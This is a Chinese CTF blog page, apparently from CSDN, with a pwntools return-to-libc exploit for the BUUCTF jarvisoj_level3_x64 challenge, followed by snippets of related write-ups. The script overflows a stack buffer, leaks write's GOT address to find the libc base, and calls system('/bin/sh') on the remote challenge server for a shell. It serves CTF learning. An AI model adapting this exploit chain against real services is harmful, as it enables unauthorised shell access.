buuoj level3 x64 return to libc

CTF远程Exploit实战
最新推荐文章于 2025-04-21 21:41:03 发布
原创 最新推荐文章于 2025-04-21 21:41:03 发布 · 275 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 

from pwn import *
#p = process('./pwn')
#p = process('./level3_x64')
p = remote("node3.buuoj.cn",25333)

p.recvuntil("Input:\n")
libc = ELF('./libc-2.23.so')

poprdiret = 0x00000000004006b3
poprsir15ret = 0x00000000004006b1
pltwrite = 0x00000000004004B0
gotwrite = 0x0000000000600A58
mainaddr = 0x000000000040061A 


payload = 'a'*0x88 + p64(poprdiret) + p64(1) + p64(poprsir15ret) + p64(gotwrite) + p64(0) + p64(pltwrite) +p64(mainaddr)

p.sendline(payload)

gotwriteaddr = u64(p.recv()[0:8])

log.success(hex(gotwriteaddr))

libcbase = gotwriteaddr - libc.symbols["write"] 

log.success(hex(libcbase))

system = libcbase + libc.symbols["system"] 
binsh = libcbase + libc.search("/bin/sh").next()


payload = 'a'*0x88 + p64(poprdiret) + p64(binsh) + p64(system) + p64(0) 

p.sendline(payload)

p.interactive()
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 616
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 1047
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
buu-[WUSTCTF2020]level3
qaq517384的博客
03-07 340
64位GCC 查看字符串,base甩脸上 看一眼main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char v3; // ST0F_1 const char *v4; // rax char v6; // [rsp+10h] [rbp-40h] unsigned __int64 v7; // [rsp+48h] [rbp-8h] v7 = __readfsqword(0x28u);
buuctf jarvisoj_level3libc
carol2358的博客
05-01 426
常规32位泄漏libc exp: from pwn import * from LibcSearcher import * local_file = './level3' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc.so.6' select = 1 if select == 0: ...
buu:[WUSTCTF2020]level3
weixin_60553183的博客
01-17 342
查壳无壳。 进去看main函数 base64问题,但是正常base64没有用。 看到这个函数,打脚本。 得到自定义base64表。 出flag.
BUUCTF jarvisoj_level3_x64
2401_88087539的博客
02-22 477
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
jarvisoj_level3_x64
最新发布
2301_81060697的博客
04-21 363
经典csu解题
jarvisoj_level1-ret2libc
个人笔记
06-13 243
利用的是pwntool模板自动搜索泄露地址匹配的libc版本。思路:无binsh,无system,考虑ret2libc
从零开始做题:逆向 ret2libc jarvisoj level1
weixin_44626085的博客
02-15 1421
pl ='a' * (0x88 + 0x4 ) + p32(write_plt) + p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4) # 栈迁移过来后 执行write函数 write后返回main函数 write的三个参数。libc=LibcSearcher('write',write_addr) #根据泄漏的write地址,用LibcSearcher可以找到对应的libc版本,然后找到对应的write函数地址。基本全关,栈可执行。
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1686
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
【BUUCTF】jarvisoj_level3_x64,picoctf_2018_rop chain
m0_51251108的博客
12-30 246
【BUUCTF】jarvisoj_level3_x64 ROPgadget缺了rdx,对应的是输出的长度,要大于8 gdb调试可以看到rdx的值是0x200,足够大,不用管了 from pwn import* r=remote('node3.buuoj.cn',29628) libc=ELF('./libc-2.23.so') elf=ELF('./level3_x64') context.log_level = 'debug' context.arch = elf.arch pop_rdi=0x4006
[BUUCTF]PWN——jarvisoj_level3_x64
mcmuyanga的博客
11-04 1743
jarvisoj_level3_x64 附件 步骤: 例行检查,64位程序,开启了nx保护 试运行一下程序,看看大概的情况 64位ida载入,习惯性的检索字符串,没有发现可以直接利用的system,估计使用ret2libc的方法 从main函数开始看程序 function()函数 输入点buf明显的溢出漏洞,read之前已经调用过一个write函数了,可以利用它来泄露libc版本 利用过程 泄露libc版本 64位程序传参需要用到寄存器rdi,找一下设置rdi寄存器的指令 https://
BUUCTF jarvisoj_level3
红叶的博客
10-27 553
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
buuctf刷题记录18 [WUSTCTF2020]level3
ytj00的博客
08-01 897
经典无壳,拖进ida 最后输出的里面有衣穿加密字符串,一看就知道是base加密的,然后提上又提示是base64加密,拿去解密发现不对,感觉应该是吧base64的码表改了 然后找半天没找到那个函数, 然后找到这个奇怪的函数,果然是吧码表换了 写出脚本,得到改变的码表 然后根据之前的加密字符串,再写脚本 import base64 import string str1 = "d2G0ZjLwHjS7DmOzZAY0X2lzX3CoZV9zdNOydO9vZl9yZXZlcnGlfD==" strin
深入理解Return-To-Libc攻击实验与防御
"ret2libc" 是 "Return-To-Libc" 的缩写形式,这是标签中最关键的术语,它表明了整个实验的核心是围绕 Return-To-Libc 攻击技术展开。标签的使用是为了在搜索、分类和检索资料时提供方便。了解标签 "ret2libc" 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值